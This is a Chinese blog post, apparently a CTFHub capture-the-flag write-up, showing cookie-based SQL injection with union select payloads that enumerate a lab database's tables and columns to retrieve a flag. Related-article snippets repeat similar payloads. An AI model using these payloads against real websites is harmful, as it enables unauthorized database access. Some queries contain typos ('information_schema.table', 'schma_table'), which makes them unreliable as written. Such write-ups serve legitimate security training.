CTFHub-Cookie注入

最新推荐文章于 2023-10-10 12:41:22 发布
最新推荐文章于 2023-10-10 12:41:22 发布
阅读量158 收藏
点赞数
分类专栏: CTFHub 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51589948/article/details/117041430
版权

** Cookie注入**

  1. 根据提示寻找Cookie,对其进行bp抓包,并发包到repeater
    对cookie进行注入判断
    -1 union select 1,2
    在这里插入图片描述
  2. 在注入后回显并显示内容,判断为Cookie注入,按照正常的注入流程获取flag
    -1 union select database(),1 查库名
    在这里插入图片描述
  3. 然后查询数据库的表名
    -1 union select 1,group_concat(table_name) from information_schema.table where table_schema=‘sqli’
    在这里插入图片描述
    表名分别为 news 和 kdekdoxcuj
  4. 然后查询kdekdoxcuj的列名
    -1 union select 1,group_concat(column_name) from information_schema.columns where schma_table=‘sqli’ and table_name=‘kdekdoxcuj’
    在这里插入图片描述
  5. 查询该库该表该列的所有字段
    -1 union select 1,group_concat(mkpojtslyb) from kdekdoxcuj
    在这里插入图片描述
    得出flag
混混的小胖子233
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFHub-sql注入-Cookie注入
weixin_51706044的博客
06-06 1203
文章目录Cookie注入解法二 Cookie注入 cookie注入和以往的题目有所不同,注入点是在cookie中 查看该页面的Cookie 可以看到这里的Cookie是id=1 进行测试是否为Cookie注入 burp进行抓包注入 判断列数 可以看到列数为2的时候回显正常,因此判断列数为2 进行联合查询 爆数据库 id=1 union select 1,database() 爆数据表 id=13 union select 1,group_concat(table_name) from inf
CTFHUB-Cookie注入
Web学习之路
03-28 200
cookie
CTFhub Cookie注入
plant1234的博客
06-18 735
Cookie注入: 首先更具题目启动环境得到: 发现这是cookie注入,于是就利用bp抓包得到: 发现cookie 能传参数,于是传入: 2 1’ 1 and 1=1 1’ and 1=1# 1 and 1=2 得到: 可以看到在1’ ,1’ and 1=1 ,1 and 1=2 出没有回显 在1 and 1=1 处得到正确回显 所以是存在注入的 于是用语句查看字段数: 看到有3报错,所以有两个字段 于是去得到当前库名: 在得到表名: ...
cookie注入
LSYZWF的博客
05-20 1743
文章目录cooike注入cooike注入原理:cooike注入形成条件:cooike注入阶段:设置cooikeSQL-lab实战(less-21)参考文档参考文档 cooike注入 cooike注入原理: 修改cooike的值,使注入的值能够在拼接数据库查询语句从而获得信息,基本上与SQL注入中的get方式提交和post表单方式提交无区别。 cooike注入形成条件: 1、程序对get和post方式提交的数据进行了过滤,但未对cookie提交的数据库进行过滤。 2、在条件1的基础上还需要程序对提交数据获取方
SQL注入10】cookie注入基础及实践(基于BurpSuite工具和Sqli-labs-less20靶机平台)
Fighting_hawk的博客
02-21 3751
1. 了解get、post注入cookie注入的区别。 2. 掌握cookie注入的方法。
tiny-cookie:一个用于浏览器的小型 cookie 操作插件
05-31
一个用于浏览器的小型 cookie 操作插件。 从1.x升级到2.x :您可以检查 如果您使用过 tiny-cookie,那么您可能会对感兴趣,这是一个专注于 Web 开发的函数集合。 安装 新产品管理: npm install tiny-cookie 用法...
js-cookie.js
03-31
js_cookie源码下载,js-cookie用于操作cookie,笔者是因为一开始不会弄,后来会整下来了,鉴于自身经历,故将其分享出来。
flask-session-cookie-manager
01-29
使用python脚本更改或生成cookie
my-js-cookie
03-25
造一个js-cookie车轮 项目源码: : 预览链接:http: 参考轮子: : Cookie相信大家都不陌生,但是很多时候我们都是这样:手写一个js-cookie的库,今天就带大家一起来写一个js-cookie的小库。 从零开始 首先,我们...
flask-session-cookie-manager-master.zip
09-05
CTFsession伪造脚本,有解密和加密的,一定要有私钥才能进行。
cookie注入解析
vivlol918的博客
06-12 539
Cookie注入原理是利用Web应用程序中在客户端保存用户身份验证信息的Cookie来实现攻击的一种方法。攻击者通过篡改Cookie的值来实现伪造用户身份、注入有害代码、窃取用户数据和会话劫持等攻击行为。
cookie 注入
白菜执笔人的博客
03-01 532
Web安全攻防 学习笔记 一、cookie 注入 1.1、HTTP 头中的注入介绍         服务器可以利用 cookies 包含信息的任意性来筛选并经常性维护这些信息,以判断在 HTTP 传 输中的状态。cookies 最经典的应用就是判断用户是否已经登录网站。 1.2、cookie 注入 代码中使用 Cookie 传递参数,但是没有对 Coo...
SQL注入cookie注入攻击
coderge's CSDN Blog.
09-19 1691
目录 1 cookie注入代码分析 2 实验过程 1 cookie注入代码分析 通过$_COOKIE能获取浏览器cookie中的数据,在cookie注 入页面中程序通过$_COOKIE获取参数ID,然后直接将ID拼接到select语句中进行查询,如果有结果,则将结果输出到页面,代码如下所示。 <?php $id = $_COOKIE['id']; $value = "1"; setcookie("id",$value); $con=mysqli_connect("local
SQL注入——cookie注入
最新发布
weixin_74991270的博客
10-10 492
工具很方面,但是IP老是被ban手工虽说很麻烦,但是还是有惊喜的多挖挖src增加实战经验。
【漏洞挖掘】——23、XXE漏洞挖掘刨析(上)
Fly_鹏程万里
03-05 3057
XML(可扩展标记语言)是用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,它是一种允许用户对自己的标记语言进行定义的源语言,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。
SQL注入之路之八:Cookie注入
weixin_62715196的博客
08-14 197
文章主要讲述Cookie注入的一次实操过程
爬虫系列笔记五cookie
h91er的博客
10-18 339
爬虫系列笔记五cookie
CTFHUB-WEB-SQL注入-cookie注入
weixin_43486981的博客
08-11 875
利用cookie值进行注入(把cookie值作为注入点) 题目: 靶机环境:可以看到页面没有可以输入的地方,根据题目,想到利用cookie值输入 使用burp suite抓包,在cookie值处输入注入语句,进行注入 查看回显位 求数据库名 求表名 求列名 求字段值,即可得到flag ...
关于cookie注入
告白的博客
07-07 369
0x00 关于cookie注入介绍 cookie注入也称作加解密注入,账户信息等可能通过加密传输,可通过抓包获取cookie信息,以及对源码分析信息结果加密后传入传出数据库,通过寻找其相关的加密方式,使注入语句加密进行注入 0x01 sqil-20-21cookie示例 通过bur抓取数据包发现cookie信息,less-20使用cookie传输但未作加密,直接在数据包通过cookie位置进行注入注入方式参考前面的联合注入,即可注入成功 -admin' union select 1,(select gro
ctfhub sql注入cookie
06-06
题目内容大致为:“CTFHub SQL注入cookie”,需要进行进一步的解释和回答。 首先,“CTFHub”是指一种网络安全比赛形式,全称为“Capture The Flag Hub”,所以这道题是CTFHub比赛的一个部分。 其次,“SQL注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值